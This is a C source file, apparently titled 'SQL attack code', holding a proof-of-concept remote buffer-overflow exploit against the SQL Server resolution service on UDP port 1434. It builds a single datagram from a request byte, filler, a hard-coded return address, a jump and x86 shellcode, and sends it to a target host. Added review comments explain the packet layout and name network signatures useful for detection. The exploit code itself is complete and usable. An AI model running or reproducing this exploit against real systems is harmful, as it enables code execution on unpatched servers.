📄 sql-攻击代码.c
#include <stdio.h>
#include <winsock2.h>
#pragma comment (lib,"Ws2_32")
/*
 * Map a host name or dotted-quad string to an IPv4 address.
 *
 * name: string handed to gethostbyname() and inet_addr().
 *
 * Returns 0 when gethostbyname() fails. Otherwise returns the value of
 * inet_addr(name), or, when inet_addr() rejects the string (returns -1),
 * the first 4 bytes of the resolver's h_addr entry. The value is passed
 * through as the library produced it; no byte swapping is done here.
 */
unsigned int resolve(char *name)
{
    struct hostent *entry = gethostbyname(name);
    unsigned int addr;

    /* The lookup is attempted first, even for a literal address. */
    if (entry == 0)
        return 0;

    addr = inet_addr(name);
    if (addr == (unsigned int)(-1)) {
        /* Not a dotted quad: take the resolver's answer instead. */
        memcpy(&addr, entry->h_addr, 4);
    }

    return addr;
}
/*
 * Proof-of-concept sender: builds one oversized UDP datagram and sends it to
 * port 1434 of the host named in argv[1]. UDP 1434 is the port used by the
 * SQL Server resolution/browser service, which matches the listing's title.
 *
 * Packet layout as built below (offsets into buf2):
 *   [0]        0x04
 *   [1..96]    0xCC filler
 *   [97..100]  the 32-bit value held in EIP
 *   [101..108] forwardjump (8 bytes)
 *   [109..112] the 32-bit value held in EAX
 *   [113..171] shellcode (59 bytes)
 *   [172]      0x00 terminator
 *
 * Exit status: -1 on bad usage or socket() failure, -2 when the target
 * cannot be resolved, exit(1) when WSAStartup() fails, 0 otherwise. A
 * sendto() failure is only printed and still returns 0.
 *
 * NOTE(review): the file does not include <string.h> or <stdlib.h> although
 * memset/memcpy/strlen/exit are used, and WSACleanup() is never called on the
 * normal path.
 */
int main(int argc,char *argv[])
{
int s;
/* Staging buffer for the datagram; only the first 173 bytes are sent. */
char buf2[350];
struct sockaddr_in target;
/*
 * Hard-coded 32-bit values copied into the packet at offsets 97 and 109.
 * NOTE(review): the names suggest they are meant to end up in the saved
 * return address and in a register of the receiving process; they look like
 * addresses tied to one specific build of the target's libraries. Nothing in
 * this file confirms which build.
 */
int EIP = 0x78024e02;
int EAX = 0x42d01e40;
/*
 * Each "\x0.." escape is one byte, so this is EB 0A CC CC CC CC CC CC.
 * On x86, EB 0A is a short jump 10 bytes forward and CC is INT3; from offset
 * 101 the jump lands on offset 113, where the shellcode is copied.
 */
unsigned char forwardjump[]="\x0eb\x0a\x0cc\x0cc\x0cc\x0cc\x0cc\x0cc";
WSADATA WSAData;
/*
 * 59-byte x86 payload containing no 0x00 byte, so strlen() below measures
 * it in full. Its immediates include the ASCII fragments "\sca", "n_sq",
 * "l2k_" and "bo.A", followed by two calls through absolute addresses in
 * the 0x7801xxxx range.
 * NOTE(review): presumably the payload creates a marker file with that name
 * on the receiving host. This is inferred from the bytes, not verified. If
 * correct, a file of that name is a host-side artifact worth searching for.
 */
BYTE shellcode[] = ""
"\x8B\xF1\x33\xC0\xC7\x06\x5C\x73\x63\x61\xC7\x46\x04\x6E\x5F\x73"
"\x71\xC7\x46\x08\x6C\x32\x6B\x5F\xC7\x46\x0C\x62\x6F\x2E\x41\x88"
"\x46\x0F\x66\xB8\x80\x01\x50\x66\xB8\x01\x81\x50\x56\xB8\x6C\xC2"
"\x01\x78\xFF\xD0\xB8\xC7\x3E\x01\x78\xFF\xD0";
/* Exactly one argument is expected: the destination host or address. */
if (argc!=2)
{
printf("usage: %s ip\n",argv[0]);
return -1;
}
/* Request Winsock 1.1. */
if(WSAStartup (MAKEWORD(1,1), &WSAData) != 0)
{
printf("WSAStartup failed.\n");
/* NOTE(review): cleanup is called here although startup did not succeed. */
WSACleanup();
exit(1);
}
/* Connectionless socket: the whole exchange is a single datagram. */
s = socket(AF_INET,SOCK_DGRAM,0);
if(s<0)
return -1;
memset((char *)&target,0,sizeof(target));
target.sin_family = AF_INET;
target.sin_addr.s_addr = resolve(argv[1]);
/* resolve() returns 0 on lookup failure. */
if(target.sin_addr.s_addr==0)
{
closesocket(s);
return -2;
}
target.sin_port = htons(1434);
/* Pre-fill with 0xCC so every byte not overwritten below is INT3 filler. */
memset(buf2,0xcc,sizeof(buf2));
/* First byte of the datagram; the service reads it as the request type. */
buf2[0] = 0x04;
/*
 * NOTE(review): these two stores write an unsigned int through a cast char
 * pointer at offsets that are not 4-byte aligned. x86 tolerates this, but
 * the C standard does not guarantee it.
 */
*(unsigned int *)&buf2[97] = EIP;
/* NOTE(review): strlen() is applied to unsigned char / BYTE arrays here. */
memcpy(&buf2[101], forwardjump, strlen(forwardjump));
*(unsigned int *)&buf2[109] = EAX;
memcpy(&buf2[113], shellcode, strlen(shellcode));
/* 1+96+8+8+59 = 172: NUL directly after the payload, bounding strlen(buf2). */
buf2[1+96+8+strlen(forwardjump)+strlen(shellcode)]=0;
/*
 * What a defender sees on the wire: one UDP datagram to port 1434 carrying
 * strlen(buf2)+1 bytes (173 with the constants above), starting 0x04 and
 * followed by 96 bytes of 0xCC. Size checks on 0x04 requests to UDP 1434,
 * filtering that port at the network edge, and keeping the listening
 * service patched all address a packet of this shape.
 * NOTE(review): &target is passed without a cast to struct sockaddr *.
 */
if (sendto(s, buf2, strlen(buf2)+1, 0, &target, sizeof(target)) == SOCKET_ERROR)
printf("Error: sendto() failed.\n");
closesocket(s);
return 0;
}